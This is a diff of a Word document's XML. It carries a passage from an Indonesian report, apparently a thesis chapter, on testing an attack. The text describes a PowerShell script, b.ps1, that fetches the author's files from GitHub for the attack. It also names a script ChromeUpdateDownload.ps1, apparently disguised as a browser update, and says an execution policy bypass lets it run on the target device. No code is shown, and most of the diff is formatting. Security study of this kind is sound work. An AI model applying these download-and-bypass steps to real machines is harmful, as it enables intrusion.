-        </w:rPr>
-        <w:t xml:space="preserve">dari Github, terlebih dahulu membuat </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">script </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">bernama b,ps1 yang berisikan perintah untuk mengunduh </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">file </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>dari Github</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">karena pada CMD tidak bisa langsung menggunakan perintah </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">wget </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>seperti yang ditampilkan pada gambar V-5.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
         <w:keepNext/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EFA099B" wp14:editId="0443830D">
-            <wp:extent cx="4572000" cy="2119546"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="57" name="Picture 57"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69371EC0" wp14:editId="5A4CB504">
+            <wp:extent cx="4609301" cy="2948025"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="5080"/>
+            <wp:docPr id="55" name="Picture 55"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -36134,7 +35832,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4613032" cy="2138568"/>
+                      <a:ext cx="4634657" cy="2964242"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -36150,6 +35848,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="720"/>
         <w:jc w:val="center"/>
         <w:rPr>
@@ -36158,7 +35857,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="146" w:name="_Toc43425326"/>
+      <w:bookmarkStart w:id="144" w:name="_Toc43425325"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -36193,7 +35892,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>5</w:t>
+        <w:t>4</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36208,62 +35907,200 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">. Baris Perintah </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Membuat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+        <w:t>. Folder Baru Berhasil Dibuat</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="144"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:ind w:hanging="11"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="145" w:name="_Toc43427733"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pengujian Mengunduh </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">Script </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>b.ps1</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="146"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
+        <w:t>File</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dari Github</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="145"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pada tahap ini akan dilakukan pengujian dengan mengunduh </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dari Github penulis yang nantinya akan digunakan selama proses penyerangan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>. Namun</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sebelum mengunduh </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dari Github, terlebih dahulu membuat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">bernama b,ps1 yang berisikan perintah untuk mengunduh </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>dari Github</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">karena pada CMD tidak bisa langsung menggunakan perintah </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">wget </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>seperti yang ditampilkan pada gambar V-5.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
         <w:keepNext/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4028AB16" wp14:editId="53580567">
-            <wp:extent cx="4574990" cy="2926080"/>
-            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
-            <wp:docPr id="58" name="Picture 58"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EFA099B" wp14:editId="0443830D">
+            <wp:extent cx="4572000" cy="2119546"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="57" name="Picture 57"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -36283,7 +36120,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4598906" cy="2941376"/>
+                      <a:ext cx="4613032" cy="2138568"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -36299,15 +36136,15 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Caption"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="2160" w:firstLine="720"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="147" w:name="_Toc43425327"/>
+      <w:bookmarkStart w:id="146" w:name="_Toc43425326"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -36342,7 +36179,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>6</w:t>
+        <w:t>5</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36357,7 +36194,23 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
+        <w:t xml:space="preserve">. Baris Perintah </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Membuat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36375,115 +36228,13 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>b.ps1 Berhasil Dibuat</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="147"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t xml:space="preserve">Gambar V-6 menunjukkan bahwa </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>script</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ChromeUpdateDownload.ps1 sudah siap untuk diunduh. Saat menjalankan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">script </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">b.ps1 dan ChromeUpdateDownload.ps1, dilakukan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>execution policy bypass</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> terlebih dahulu aga</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">r dapat berjalan tanpa halangan di powershell pada perangkat target. Pada Gambar V-7 ditampilkan perintah untuk menjalankan kedua </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">script </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>tersebut.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>b.ps1</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="146"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
         <w:keepNext/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
@@ -36493,11 +36244,12 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32842B37" wp14:editId="77292D8B">
-            <wp:extent cx="4593945" cy="1928323"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="59" name="Picture 59"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4028AB16" wp14:editId="53580567">
+            <wp:extent cx="4574990" cy="2926080"/>
+            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
+            <wp:docPr id="58" name="Picture 58"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -36517,7 +36269,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4637233" cy="1946493"/>
+                      <a:ext cx="4598906" cy="2941376"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -36534,66 +36286,64 @@
       <w:pPr>
         <w:pStyle w:val="Caption"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1440"/>
-        <w:jc w:val="both"/>
+        <w:ind w:left="2160" w:firstLine="720"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="147" w:name="_Toc43425327"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:noProof/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="148" w:name="_Toc43425328"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">Gambar V- </w:t>
+        <w:fldChar w:fldCharType="end"/>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>7</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">.  Perintah Menjalankan </w:t>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36603,46 +36353,31 @@
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>Script</w:t>
+        <w:t xml:space="preserve">Script </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:noProof/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:noProof/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Dengan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i/>
-          <w:iCs/>
-          <w:noProof/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Execution Policy</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="148"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>b.ps1 Berhasil Dibuat</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="147"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -36658,13 +36393,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">Gambar V-8 berikut menampilkan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">seluruh </w:t>
+        <w:t xml:space="preserve">Gambar V-6 menunjukkan bahwa </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36672,25 +36401,13 @@
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">file </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>unduhan dari Github</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> penulis</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dengan menjalankan </w:t>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ChromeUpdateDownload.ps1 sudah siap untuk diunduh. Saat menjalankan </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36698,19 +36415,47 @@
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>script</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> b.ps1 dan ChromeUpdateDownload.ps1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve">script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">b.ps1 dan ChromeUpdateDownload.ps1, dilakukan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>execution policy bypass</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> terlebih dahulu aga</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">r dapat berjalan tanpa halangan di powershell pada perangkat target. Pada Gambar V-7 ditampilkan perintah untuk menjalankan kedua </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>tersebut.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -36734,12 +36479,11 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6240F9C9" wp14:editId="5CB7B6BB">
-            <wp:extent cx="4563553" cy="2918765"/>
-            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
-            <wp:docPr id="60" name="Picture 60"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32842B37" wp14:editId="77292D8B">
+            <wp:extent cx="4593945" cy="1928323"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="59" name="Picture 59"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -36759,7 +36503,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4608778" cy="2947690"/>
+                      <a:ext cx="4637233" cy="1946493"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -36776,80 +36520,66 @@
       <w:pPr>
         <w:pStyle w:val="Caption"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1440" w:firstLine="545"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="149" w:name="_Toc43425329"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Gambar V- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
+        <w:ind w:left="1440"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:noProof/>
-        </w:rPr>
-        <w:t>8</w:t>
-      </w:r>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="148" w:name="_Toc43425328"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
         </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
+        <w:t xml:space="preserve">Gambar V- </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>. Berhasil Mengunduh</w:t>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> seluruh</w:t>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>7</w:t>
+      </w:r>
